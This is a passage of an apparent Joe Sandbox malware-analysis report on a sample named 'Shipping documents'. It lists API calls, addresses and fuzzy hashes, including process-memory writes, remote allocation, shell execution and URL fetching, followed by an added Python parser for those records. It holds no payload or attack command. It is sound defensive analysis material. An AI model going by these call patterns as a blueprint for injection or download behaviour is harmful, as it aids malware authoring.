• Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
• Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
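Each function record above lists its resolved calls as bullets of the form `Api.MODULE(args), ref: address`, with calls reached through a callee prefixed `Part of subcall function XXXXXXXX:`, unresolved arguments shown as `?`, and CRT routines attributed to the pseudo-module LIBCMT. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses such a list into structured records so the API set of a function can be diffed against other records or samples, or searched for specific call sites. The sample input is constructed from the GUI-cleanup record (call sites 00455728 to 00455760) and two lines of the CRT thread-exit records above; the `MODULE!Api` naming is this example's own convention and is unrelated to the report's `API ID` string.

```python
"""Parse the per-function 'APIs' bullets of a Joe Sandbox code-analysis record."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed sample input: the API list of the DestroyWindow/DeleteObject cleanup
# routine (call sites 0x455728-0x455760) copied from the record above, plus two lines
# from the CRT records to exercise the no-argument and '@N'-suffixed name forms.
SAMPLE = """\
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyWindow.USER32(?), ref: 00455728
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
• ExitThread.KERNEL32 ref: 00413D4E
• ___fls_getvalue@4.LIBCMT ref: 00413D2B
"""


@dataclass(frozen=True)
class ApiCall:
    api: str                         # e.g. "DestroyWindow"
    module: str                      # e.g. "USER32"; LIBCMT marks statically linked CRT code
    args: Tuple[Optional[int], ...]  # immediates as ints, None where the report prints '?'
    ref: int                         # address of the call site inside the dumped image
    subcall_of: Optional[int]        # callee address for "Part of subcall function" lines


# One bullet: [Part of subcall function XXXXXXXX:] Api.MODULE[(args)][,] ref: XXXXXXXX
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    return None if token == "?" else int(token, 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API bullet in `text`; lines that are not API bullets are ignored."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(_parse_arg(a) for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def api_set(calls: List[ApiCall], include_subcalls: bool = False) -> Set[str]:
    """Distinct 'MODULE!Api' names used by the function (this example's own naming,
    not the report's 'API ID' string). Subcall lines are excluded unless requested."""
    return {f"{c.module}!{c.api}" for c in calls
            if include_subcalls or c.subcall_of is None}


def call_sites(calls: List[ApiCall], api: str) -> List[int]:
    """All call-site addresses of one API, so repeated calls (two DestroyWindow sites
    here) are not collapsed the way a name set collapses them."""
    return sorted(c.ref for c in calls if c.api == api)


def imported_modules(calls: List[ApiCall]) -> Set[str]:
    """Modules other than the CRT, i.e. what the function needs from the OS."""
    return {c.module for c in calls if c.module != "LIBCMT"}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        via = f"  (via {c.subcall_of:08X})" if c.subcall_of else ""
        print(f"{c.ref:08X} {c.module}!{c.api}{c.args}{via}")
    print("API set:", sorted(api_set(parsed)))
```

Lines that are not API bullets (the `Memory Dump Source` and `Similarity` fields) are skipped rather than rejected, so a whole record can be fed in unchanged. Subcall lines are kept but excluded from the default API set, because they describe a callee's imports, not the function's own; pass `include_subcalls=True` when the transitive set is wanted.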
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )$U$\
                                                                                                          • API String ID: 0-3705770531
                                                                                                          • Opcode ID: cab44b3ffacf814a37243ad8e9565b9a9019564313d98acd175bff8324d5f553
                                                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                          • Opcode Fuzzy Hash: cab44b3ffacf814a37243ad8e9565b9a9019564313d98acd175bff8324d5f553
                                                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                          APIs
                                                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                          • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                          • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                          • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                          • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                          • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                          • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                          • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                          • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                          • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 708495834-557222456
                                                                                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                          APIs
                                                                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \$]$h
                                                                                                          • API String ID: 4104443479-3262404753
                                                                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                          APIs
                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                          • String ID: <$@
                                                                                                          • API String ID: 2417854910-1426351568
                                                                                                          APIs
                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3705125965-3916222277
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 135850232-4108050209
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 3375834691-2298589950
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: $<
                                                                                                          • API String ID: 4104443479-428540627
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$LabelVolume
• String ID: \VH
• API String ID: 2006950084-234962358
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 772068139-4108050209
                                                                                                          • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                          • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcscpy
                                                                                                          • String ID: 3, 3, 8, 1
                                                                                                          • API String ID: 3469035223-357260408
                                                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
